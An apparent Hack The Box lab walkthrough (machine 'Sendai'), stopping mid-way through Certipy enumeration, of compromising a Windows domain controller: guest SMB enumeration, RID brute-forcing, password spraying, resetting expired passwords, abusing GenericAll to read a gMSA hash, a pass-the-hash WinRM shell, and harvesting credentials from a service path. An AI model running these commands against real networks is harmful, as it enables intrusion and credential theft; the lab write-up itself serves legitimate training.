Nmap
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ nmap -sC -sV -Pn 10.129.234.66 -oN ./nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-02 08:40 UTC
Nmap scan report for 10.129.234.66
Host is up (0.33s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-02 08:41:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2025-08-18T12:30:05
|_Not valid after: 2026-08-18T12:30:05
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl
| Not valid before: 2023-07-18T12:39:21
|_Not valid after: 2024-07-18T00:00:00
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2025-08-18T12:30:05
|_Not valid after: 2026-08-18T12:30:05
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2025-08-18T12:30:05
|_Not valid after: 2026-08-18T12:30:05
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2025-08-18T12:30:05
|_Not valid after: 2026-08-18T12:30:05
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.sendai.vl
| Not valid before: 2025-04-15T02:26:14
|_Not valid after: 2025-10-15T02:26:14
| rdp-ntlm-info:
| Target_Name: SENDAI
| NetBIOS_Domain_Name: SENDAI
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sendai.vl
| DNS_Computer_Name: dc.sendai.vl
| DNS_Tree_Name: sendai.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-09-02T08:42:31+00:00
|_ssl-date: 2025-09-02T08:43:12+00:00; +1m10s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 1m09s, deviation: 0s, median: 1m09s
| smb2-time:
| date: 2025-09-02T08:42:33
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.78 seconds
The domain name is dc.sendai.vl, let's add it to our /etc/hosts
SMB - TCP 445
Firstly, let's check the SMB service of this domain
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb dc.sendai.vl
SMB 10.129.247.57 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False) (Guest Auth:True)
Then let's try to use guest account to enumerate the shares
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb dc.sendai.vl -u guest -p ''
SMB 10.129.247.57 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.129.247.57 445 DC [+] sendai.vl\guest:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb dc.sendai.vl -u guest -p '' --shares
SMB 10.129.247.57 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.129.247.57 445 DC [+] sendai.vl\guest:
SMB 10.129.247.57 445 DC [*] Enumerated shares
SMB 10.129.247.57 445 DC Share Permissions Remark
SMB 10.129.247.57 445 DC ----- ----------- ------
SMB 10.129.247.57 445 DC ADMIN$ Remote Admin
SMB 10.129.247.57 445 DC C$ Default share
SMB 10.129.247.57 445 DC config
SMB 10.129.247.57 445 DC IPC$ READ Remote IPC
SMB 10.129.247.57 445 DC NETLOGON Logon server share
SMB 10.129.247.57 445 DC sendai READ company share
SMB 10.129.247.57 445 DC SYSVOL Logon server share
SMB 10.129.247.57 445 DC Users READ
Usersand sendaishare would be our target
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ smbclient //dc.sendai.vl/Users -N
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Tue Jul 11 09:58:27 2023
.. DHS 0 Wed Apr 16 02:55:42 2025
Default DHR 0 Tue Jul 11 16:36:32 2023
desktop.ini AHS 174 Sat May 8 08:18:31 2021
Public DR 0 Tue Jul 11 07:36:58 2023
7019007 blocks of size 4096. 860730 blocks available
There is nothing interesting here from Usersdrive, continue to check sendaishare
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ smbclient //dc.sendai.vl/sendai -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jul 18 17:31:04 2023
.. DHS 0 Wed Apr 16 02:55:42 2025
hr D 0 Tue Jul 11 12:58:19 2023
incident.txt A 1372 Tue Jul 18 17:34:15 2023
it D 0 Tue Jul 18 13:16:46 2023
legal D 0 Tue Jul 11 12:58:23 2023
security D 0 Tue Jul 18 13:17:35 2023
transfer D 0 Tue Jul 11 13:00:20 2023
7019007 blocks of size 4096. 854691 blocks available
smb: \> get incident.txt
Now we can check this file
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ cat incident.txt
Dear valued employees,
We hope this message finds you well. We would like to inform you about an important security update regarding user account passwords. Recently, we conducted a thorough penetration test, which revealed that a significant number of user accounts have weak and insecure passwords.
To address this concern and maintain the highest level of security within our organization, the IT department has taken immediate action. All user accounts with insecure passwords have been expired as a precautionary measure. This means that affected users will be required to change their passwords upon their next login.
We kindly request all impacted users to follow the password reset process promptly to ensure the security and integrity of our systems. Please bear in mind that strong passwords play a crucial role in safeguarding sensitive information and protecting our network from potential threats.
If you need assistance or have any questions regarding the password reset procedure, please don't hesitate to reach out to the IT support team. They will be more than happy to guide you through the process and provide any necessary support.
Thank you for your cooperation and commitment to maintaining a secure environment for all of us. Your vigilance and adherence to robust security practices contribute significantly to our collective safety.
That means a significant number of user accounts have weak and insecure passwords.
So let's try to RID Bruteforceto get a username list
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb dc.sendai.vl -u guest -p '' --rid-brute
SMB 10.129.247.57 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.129.247.57 445 DC [+] sendai.vl\guest:
SMB 10.129.247.57 445 DC 498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.247.57 445 DC 500: SENDAI\Administrator (SidTypeUser)
SMB 10.129.247.57 445 DC 501: SENDAI\Guest (SidTypeUser)
SMB 10.129.247.57 445 DC 502: SENDAI\krbtgt (SidTypeUser)
SMB 10.129.247.57 445 DC 512: SENDAI\Domain Admins (SidTypeGroup)
SMB 10.129.247.57 445 DC 513: SENDAI\Domain Users (SidTypeGroup)
SMB 10.129.247.57 445 DC 514: SENDAI\Domain Guests (SidTypeGroup)
SMB 10.129.247.57 445 DC 515: SENDAI\Domain Computers (SidTypeGroup)
SMB 10.129.247.57 445 DC 516: SENDAI\Domain Controllers (SidTypeGroup)
SMB 10.129.247.57 445 DC 517: SENDAI\Cert Publishers (SidTypeAlias)
SMB 10.129.247.57 445 DC 518: SENDAI\Schema Admins (SidTypeGroup)
SMB 10.129.247.57 445 DC 519: SENDAI\Enterprise Admins (SidTypeGroup)
SMB 10.129.247.57 445 DC 520: SENDAI\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.247.57 445 DC 521: SENDAI\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.247.57 445 DC 522: SENDAI\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.247.57 445 DC 525: SENDAI\Protected Users (SidTypeGroup)
SMB 10.129.247.57 445 DC 526: SENDAI\Key Admins (SidTypeGroup)
SMB 10.129.247.57 445 DC 527: SENDAI\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.247.57 445 DC 553: SENDAI\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.247.57 445 DC 571: SENDAI\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.247.57 445 DC 572: SENDAI\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.247.57 445 DC 1000: SENDAI\DC$ (SidTypeUser)
SMB 10.129.247.57 445 DC 1101: SENDAI\DnsAdmins (SidTypeAlias)
SMB 10.129.247.57 445 DC 1102: SENDAI\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.247.57 445 DC 1103: SENDAI\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
SMB 10.129.247.57 445 DC 1104: SENDAI\sqlsvc (SidTypeUser)
SMB 10.129.247.57 445 DC 1105: SENDAI\websvc (SidTypeUser)
SMB 10.129.247.57 445 DC 1107: SENDAI\staff (SidTypeGroup)
SMB 10.129.247.57 445 DC 1108: SENDAI\Dorothy.Jones (SidTypeUser)
SMB 10.129.247.57 445 DC 1109: SENDAI\Kerry.Robinson (SidTypeUser)
SMB 10.129.247.57 445 DC 1110: SENDAI\Naomi.Gardner (SidTypeUser)
SMB 10.129.247.57 445 DC 1111: SENDAI\Anthony.Smith (SidTypeUser)
SMB 10.129.247.57 445 DC 1112: SENDAI\Susan.Harper (SidTypeUser)
SMB 10.129.247.57 445 DC 1113: SENDAI\Stephen.Simpson (SidTypeUser)
SMB 10.129.247.57 445 DC 1114: SENDAI\Marie.Gallagher (SidTypeUser)
SMB 10.129.247.57 445 DC 1115: SENDAI\Kathleen.Kelly (SidTypeUser)
SMB 10.129.247.57 445 DC 1116: SENDAI\Norman.Baxter (SidTypeUser)
SMB 10.129.247.57 445 DC 1117: SENDAI\Jason.Brady (SidTypeUser)
SMB 10.129.247.57 445 DC 1118: SENDAI\Elliot.Yates (SidTypeUser)
SMB 10.129.247.57 445 DC 1119: SENDAI\Malcolm.Smith (SidTypeUser)
SMB 10.129.247.57 445 DC 1120: SENDAI\Lisa.Williams (SidTypeUser)
SMB 10.129.247.57 445 DC 1121: SENDAI\Ross.Sullivan (SidTypeUser)
SMB 10.129.247.57 445 DC 1122: SENDAI\Clifford.Davey (SidTypeUser)
SMB 10.129.247.57 445 DC 1123: SENDAI\Declan.Jenkins (SidTypeUser)
SMB 10.129.247.57 445 DC 1124: SENDAI\Lawrence.Grant (SidTypeUser)
SMB 10.129.247.57 445 DC 1125: SENDAI\Leslie.Johnson (SidTypeUser)
SMB 10.129.247.57 445 DC 1126: SENDAI\Megan.Edwards (SidTypeUser)
SMB 10.129.247.57 445 DC 1127: SENDAI\Thomas.Powell (SidTypeUser)
SMB 10.129.247.57 445 DC 1128: SENDAI\ca-operators (SidTypeGroup)
SMB 10.129.247.57 445 DC 1129: SENDAI\admsvc (SidTypeGroup)
SMB 10.129.247.57 445 DC 1130: SENDAI\mgtsvc$ (SidTypeUser)
SMB 10.129.247.57 445 DC 1131: SENDAI\support (SidTypeGroup)
We can save the username to file
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb dc.sendai.vl -u guest -p '' --rid-brute | grep SidTypeUser | cut -d'\' -f2 | cut -d' ' -f1 > users.txt
Then we can try to use the empty password to do password spray
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb DC.sendai.vl -u users.txt -p '' --continue-on-success
SMB 10.129.247.57 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.129.247.57 445 DC [-] sendai.vl\Administrator: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [+] sendai.vl\Guest:
SMB 10.129.247.57 445 DC [-] sendai.vl\krbtgt: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\DC$: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\sqlsvc: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\websvc: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Dorothy.Jones: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Kerry.Robinson: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Naomi.Gardner: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Anthony.Smith: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Susan.Harper: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Stephen.Simpson: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Marie.Gallagher: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Kathleen.Kelly: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Norman.Baxter: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Jason.Brady: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE
SMB 10.129.247.57 445 DC [-] sendai.vl\Malcolm.Smith: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Lisa.Williams: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Ross.Sullivan: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Clifford.Davey: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Declan.Jenkins: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Lawrence.Grant: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Leslie.Johnson: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Megan.Edwards: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE
SMB 10.129.247.57 445 DC [-] sendai.vl\mgtsvc$: STATUS_LOGON_FAILURE
Thomas.Powelland Elliot.Yateswould be next targets, we need to reset their password
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ impacket-changepasswd sendai.vl/Elliot.Yates:''@sendai.vl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Current password:
New password:
Retype new password:
[*] Changing the password of sendai.vl\Elliot.Yates
[*] Connecting to DCE/RPC as sendai.vl\Elliot.Yates
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ impacket-changepasswd sendai.vl/Thomas.Powell:''@sendai.vl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Current password:
New password:
Retype new password:
[*] Changing the password of sendai.vl\Thomas.Powell
[*] Connecting to DCE/RPC as sendai.vl\Thomas.Powell
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
Now let's try to verify these credits
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb DC.sendai.vl -u Thomas.Powell -p 'wither123.'
SMB 10.129.247.57 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.129.247.57 445 DC [+] sendai.vl\Thomas.Powell:wither123.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec winrm DC.sendai.vl -u Thomas.Powell -p 'wither123.'
WINRM 10.129.247.57 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
WINRM 10.129.247.57 5985 DC [-] sendai.vl\Thomas.Powell:wither123.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb DC.sendai.vl -u Elliot.Yates -p 'wither123.'
SMB 10.129.247.57 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.129.247.57 445 DC [+] sendai.vl\Elliot.Yates:wither123.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec winrm DC.sendai.vl -u Elliot.Yates -p 'wither123.'
WINRM 10.129.247.57 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
WINRM 10.129.247.57 5985 DC [-] sendai.vl\Elliot.Yates:wither123.
We can't use winrmto get the shell, so let's continue to enumerate the smb service
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb DC.sendai.vl -u Thomas.Powell -p 'wither123.' --shares
SMB 10.129.247.57 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.129.247.57 445 DC [+] sendai.vl\Thomas.Powell:wither123.
SMB 10.129.247.57 445 DC [*] Enumerated shares
SMB 10.129.247.57 445 DC Share Permissions Remark
SMB 10.129.247.57 445 DC ----- ----------- ------
SMB 10.129.247.57 445 DC ADMIN$ Remote Admin
SMB 10.129.247.57 445 DC C$ Default share
SMB 10.129.247.57 445 DC config READ,WRITE
SMB 10.129.247.57 445 DC IPC$ READ Remote IPC
SMB 10.129.247.57 445 DC NETLOGON READ Logon server share
SMB 10.129.247.57 445 DC sendai READ,WRITE company share
SMB 10.129.247.57 445 DC SYSVOL READ Logon server share
SMB 10.129.247.57 445 DC Users READ
configshare is the new share for us
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ smbclient '//DC.sendai.vl/config' -U 'thomas.powell%wither123.'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Oct 24 05:19:42 2025
.. DHS 0 Wed Apr 16 02:55:42 2025
.sqlconfig A 78 Tue Jul 11 12:57:11 2023
7019007 blocks of size 4096. 1195715 blocks available
smb: \> get .sqlconfig
Now we can check it
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ cat .sqlconfig
Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=SurenessBlob85;
Let's verify these credit
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb DC.sendai.vl -u sqlsvc -p SurenessBlob85
SMB 10.129.247.57 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.129.247.57 445 DC [+] sendai.vl\sqlsvc:SurenessBlob85
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec winrm DC.sendai.vl -u sqlsvc -p SurenessBlob85
WINRM 10.129.247.57 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
WINRM 10.129.247.57 5985 DC [-] sendai.vl\sqlsvc:SurenessBlob85
We can visit 1433 port, so still not worked here.
Bloodhound by thomas.powell
I’ll collect BloodHound data with both netexec
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec ldap DC.sendai.vl -u Thomas.Powell -p wither123. --bloodhound --dns-server 10.129.247.57 -c All
LDAP 10.129.247.57 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
LDAP 10.129.247.57 389 DC [+] sendai.vl\Thomas.Powell:wither123.
LDAP 10.129.247.57 389 DC Resolved collection methods: psremote, group, session, trusts, acl, dcom, rdp, objectprops, localadmin, container
From the analysis, we can find both Thomas.Powell and Elliot.Yates have interesting outbound control ![[Pasted image 20251024162050.png]]
Both users are members of the Support group, which has GenericAll permissions, while the AdmSvc group has ReadGMSAPassword permissions, and the MGTSVC$ user has ReadGMSAPassword permissions. The MGTSVC$ user is in Remote Management Users (which means it can perform WinRM operations).
use bloodyAD to add Thomas.Powell to the AdmSvc group:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ bloodyAD -u Thomas.Powell -p 'wither123.' -d sendai.vl --dc-ip 10.129.247.57 add genericAll admsvc Thomas.Powell
[+] Thomas.Powell has now GenericAll on admsvc
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ bloodyAD -u Thomas.Powell -p 'wither123.' -d sendai.vl --dc-ip 10.129.247.57 add groupMember admsvc Thomas.Powell
[+] Thomas.Powell added to admsvc
Then read GMSA Password
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec ldap DC.sendai.vl -u Thomas.Powell -p wither123. --gmsa
LDAP 10.129.247.57 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
LDAPS 10.129.247.57 636 DC [+] sendai.vl\Thomas.Powell:wither123.
LDAPS 10.129.247.57 636 DC [*] Getting GMSA Passwords
LDAPS 10.129.247.57 636 DC Account: mgtsvc$ NTLM: eb19b37b20218824d3c29f753fd5f607 PrincipalsAllowedToReadPassword: admsvc
Now we can use evil-winrmto get the shell as mgtsvc$
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ evil-winrm -i sendai.vl -u 'mgtsvc$' -H eb19b37b20218824d3c29f753fd5f607
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> whoami
sendai\mgtsvc$
Privilege Escalation
The mgtsvc$ home directory is quite empty. Administrator and sqlsvc are the only other two users with home directories in \Users:
PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/18/2023 6:09 AM Administrator
d----- 8/27/2025 8:38 AM mgtsvc$
d-r--- 7/11/2023 12:36 AM Public
d----- 8/18/2025 5:05 AM sqlsvc
The C: drive has the standard directories, plus the SMB shares:
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2025 10:19 PM config
d----- 4/15/2025 8:20 PM inetpub
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 4/15/2025 7:51 PM Program Files
d----- 7/18/2023 6:11 AM Program Files (x86)
d----- 10/23/2025 10:19 PM sendai
d----- 7/11/2023 2:35 AM SQL2019
d-r--- 10/23/2025 10:33 PM Users
d----- 8/18/2025 5:04 AM Windows
-a---- 4/15/2025 8:27 PM 32 user.txt
There’s an interesting file in inetpub
PS C:\> ls inetpub\DeviceHealthAttestation\bin
Directory: C:\inetpub\DeviceHealthAttestation\bin
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/18/2025 4:53 AM 208896 hassrv.dll
The process list via Get-Process shows a few things worth looking into:
*Evil-WinRM* PS C:\inetpub> Get-Process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
78 6 1728 6056 3968 0 AggregatorHost
391 34 12484 21772 2352 0 certsrv
81 6 2268 4012 3652 0 cmd
150 11 6624 13264 3660 0 conhost
573 23 2196 6524 432 0 csrss
176 12 1964 6068 532 1 csrss
412 34 16484 25328 3088 0 dfsrs
198 13 2312 8584 3420 0 dfssvc
281 15 3916 15064 3808 0 dllhost
10389 7476 129396 128360 2736 0 dns
633 26 19164 46676 356 1 dwm
165 12 23380 17232 5052 0 EC2Launch
72 6 784 3772 3572 0 EC2LaunchService
39 7 1536 4132 4952 1 fontdrvhost
39 7 1376 3732 4956 0 fontdrvhost
198 12 12324 12676 3100 0 helpdesk
0 0 60 8 0 0 Idle
148 13 1908 6376 3080 0 ismserv
463 27 12228 48992 5616 1 LogonUI
2104 187 73820 73876 680 0 lsass
528 31 36952 48296 2644 0 Microsoft.ActiveDirectory.WebServices
215 14 1928 4068 5948 0 MicrosoftEdgeUpdate
239 14 3100 11528 4268 0 msdtc
0 13 1996 12488 100 0 Registry
645 16 5956 14932 664 0 services
57 4 1108 1256 312 0 smss
446 23 5576 16832 1968 0 spoolsv
703 32 38324 52188 5512 0 sqlceip
757 59 369212 246832 3128 0 sqlservr
147 11 1848 8468 3136 0 sqlwriter
459 19 3736 13040 376 0 svchost
EC2Launch and EC2LaunchService are interesting.
There’s also a process called helpdesk:
198 12 12276 12640 3084 0 helpdesk
This account doesn’t have permissions to Get-Service, but I can look at the service-related registry keys. The Edge and EC2 ones are there running from their installation directories:
*Evil-WinRM* PS C:\inetpub> Get-ChildItem -Path HKLM:\SYSTEM\CurrentControlSet\services | Get-ItemProperty | Select-Object ImagePath | Select-String ec2
@{ImagePath="C:\Program Files\Amazon\EC2Launch\service\EC2LaunchService.exe"}
*Evil-WinRM* PS C:\inetpub> Get-ChildItem -Path HKLM:\SYSTEM\CurrentControlSet\services | Get-ItemProperty | Select-Object ImagePath | Select-String MicrosoftEdge
@{ImagePath="C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc}
@{ImagePath="C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc}
The helpdesk one is in C:\Windows, but more interestingly seems to have credentials in the command:
*Evil-WinRM* PS C:\inetpub> Get-ChildItem -Path HKLM:\SYSTEM\CurrentControlSet\services | Get-ItemProperty | Select-Object ImagePath | Select-String helpdesk
@{ImagePath=C:\WINDOWS\helpdesk.exe -u clifford.davey -p RFmoB2WplgE_3p -k netsvcs}
Let's verify this credit
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb DC.sendai.vl -u clifford.davey -p RFmoB2WplgE_3p
SMB 10.129.247.57 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.129.247.57 445 DC [+] sendai.vl\clifford.davey:RFmoB2WplgE_3p
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec winrm DC.sendai.vl -u clifford.davey -p RFmoB2WplgE_3p
WINRM 10.129.247.57 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
WINRM 10.129.247.57 5985 DC [-] sendai.vl\clifford.davey:RFmoB2WplgE_3p
Come back to Bloodhound
![[Pasted image 20251024163520.png]]
Clifford.Davey is a member of the CA-Operators group:
I’ll scan the ADCS instance with Certipy to check for vulnerable templates:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ certipy-ad find -vulnerable -u clifford.davey -p RFmoB2WplgE_3p -dc-ip 10.129.247.57 -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 16 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sendai-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'sendai-DC-CA'
[*] Checking web enrollment for CA 'sendai-DC-CA' @ 'dc.sendai.vl'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sendai-DC-CA
DNS Name : dc.sendai.vl
Certificate Subject : CN=sendai-DC-CA, DC=sendai, DC=vl
Certificate Serial Number : 326E51327366FC954831ECD5C04423BE
Certificate Validity Start : 2023-07-11 09:19:29+00:00
Certificate Validity End : 2123-07-11 09:29:29+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : SENDAI.VL\Administrators
Access Rights
ManageCa : SENDAI.VL\Administrators
SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
ManageCertificates : SENDAI.VL\Administrators
SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
